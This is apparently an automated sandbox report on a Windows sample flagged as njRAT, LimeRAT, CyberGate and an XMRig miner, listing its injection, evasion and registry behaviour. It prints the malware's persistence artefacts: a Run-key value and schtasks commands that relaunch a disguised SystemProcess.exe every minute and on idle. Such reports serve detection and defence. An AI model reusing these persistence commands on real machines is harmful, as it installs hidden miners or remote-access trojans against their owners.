Malware Analysis Report

2024-11-16 13:10

Sample ID 220525-bkbrjahfdr
Target 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
SHA256 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
Tags
cybergate limerat njrat xmrig noip noipchiper evasion miner persistence rat stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d

Threat Level: Known bad

The file 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d was found to be: Known bad.

Malicious Activity Summary

cybergate limerat njrat xmrig noip noipchiper evasion miner persistence rat stealer trojan upx

xmrig

njRAT/Bladabindi

CyberGate, Rebhip

LimeRAT

XMRig Miner Payload

Modifies Windows Firewall

UPX packed file

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks BIOS information in registry

Adds Run key to start application

Maps connected drives based on registry

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

AutoIT Executable

Enumerates physical storage devices

Program crash

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

NTFS ADS

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-05-25 01:11

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-05-25 01:11

Reported

2022-05-25 01:15

Platform

win7-20220414-en

Max time kernel

151s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"

Signatures

CyberGate, Rebhip

trojan stealer cybergate

LimeRAT

rat limerat

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\n.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\moxia.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\moxia.EXE N/A

Legitimate hosting services abused for malware hosting/C2

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\winmgmts:\root\cimv2 C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A
File opened for modification C:\Windows\SysWOW64\winmgmts:\root\cimv2 C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 932 set thread context of 1632 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1828 set thread context of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1692 set thread context of 1340 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1548 set thread context of 932 N/A C:\Users\Admin\AppData\Local\Temp\n.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 572 set thread context of 1440 N/A C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 892 set thread context of 700 N/A C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
PID 336 set thread context of 2108 N/A C:\Users\Admin\AppData\Roaming\Spectrum\service.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 880 set thread context of 2740 N/A C:\Users\Admin\AppData\Roaming\efsui\data.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2996 set thread context of 3036 N/A C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 set thread context of 3028 N/A C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
PID 2936 set thread context of 2176 N/A C:\Users\Admin\AppData\Roaming\Spectrum\service.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\n.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\n.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\n.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Roaming\efsui\data.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 C:\Users\Admin\AppData\Local\Temp\n.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1828 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 1828 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 1828 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 1828 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 1828 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 1828 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 1828 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 1828 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1828 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1828 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1828 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1828 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 1828 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 1828 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 1828 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 1396 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 1396 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 1396 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 1396 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 1396 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 1396 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 1396 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 1828 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 1828 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 1828 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 1828 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 932 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 932 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 932 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 932 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 932 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 932 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1828 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 1828 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 1828 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 1828 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 1828 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1828 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1828 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1828 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1828 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1828 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1828 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1828 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1828 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 1632 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe

"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"

C:\Users\Admin\AppData\Local\Temp\moxia.EXE

"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Users\Admin\AppData\Local\Temp\li4.exe

"C:\Users\Admin\AppData\Local\Temp\li4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

C:\Users\Admin\AppData\Local\Temp\n.exe

"C:\Users\Admin\AppData\Local\Temp\n.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1

